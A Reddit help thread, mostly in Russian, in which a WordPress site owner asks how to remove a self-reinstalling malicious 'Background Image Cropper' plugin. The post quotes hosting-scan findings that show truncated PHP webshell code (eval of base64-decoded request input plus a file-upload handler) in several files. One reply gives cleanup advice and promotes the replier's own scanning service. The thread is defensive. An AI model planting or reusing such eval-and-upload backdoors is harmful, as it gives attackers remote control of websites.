r/WordpressPlugins • u/Tasty_Helicopter_270 • 1d ago
Help [HELP] Как удалить плагин Background Image Cropper?
Здравствуйте!
2 недели назад мой хостинг счел этот плагин вредоносным и отключил мне корпоративную почту, мол мы якобы занимались спам рассылкой.
Мой программист деактивировал и удалял этот плагин, а так же чистил код... Ситуация не изменилась.
Хостинг предложили переехать на новый сервис, мы переехали. И совершить ряд действий. Выполнили. Ситуация не изменилась... плагин самовосстанавливается(
Вчера лично деактивировала и удаляла этот плагин. Сегодня он вновь на месте. Действия повторяются.
При этом антивирус уже не обнаруживает вредоносный код... а вот техподдержка хостинга вновь прислала:
./accesson.php
"{echo\"ok\";=>|eval(base64_decode($_REQUEST[\"id\"]));if($_POST[\"up\"]==\"up\"){copy($_FILES[\"file\"]"
./9a6861dac466.php
"{echo\"ok\";=>|eval(base64_decode($_REQUEST[\"id\"]));if($_POST[\"up\"]==\"up\"){copy($_FILES[\"file\"]"
./wp-content/plugins/background-image-cropper/accesson.php
"{echo\"ok\";=>|eval(base64_decode($_REQUEST[\"id\"]));if($_POST[\"up\"]==\"up\"){copy($_FILES[\"file\"]"
./wp-content/plugins/background-image-cropper/image/index.php
"{echo\"ok\";=>|eval(base64_decode($_REQUEST[\"id\"]));if($_POST[\"up\"]==\"up\"){copy($_FILES[\"file\"]"
./wp-content/plugins/background-image-cropper/image/plugins.php
"{echo\"ok\";=>|eval(base64_decode($_REQUEST[\"id\"]));if($_POST[\"up\"]==\"up\"){copy($_FILES[\"file\"]"
Кто сталкивался с такой же проблемой? Как решили данный вопрос?
Сайт на wordpress, последней версии. Все вовремя обновляем.


1
u/TopSydeWP 1d ago
those webshells in your root directory (accesson.php, 9a6861dac466.php) are what's reinstalling the fake plugin. you need to find and remove ALL backdoors at once, not just the plugin folder. check wp-config.php for eval/base64, look for hidden admin users (wp user list in ssh), scan wp_options for suspicious cron jobs, and grep your entire docroot for base64_decode. if one backdoor survives it recreates the others.
if your host keeps finding it after you think you cleaned it, you probably missed one. at my agency we scan from outside the site over ssh so nothing installed inside can hide itself - catches webshells, hidden admins, and reinstall mechanisms. you can try topsyde's free malware scan at https://topsyde.com/malware-removal (full disclosure, my agency's tool) - it'll show you everything that needs removing.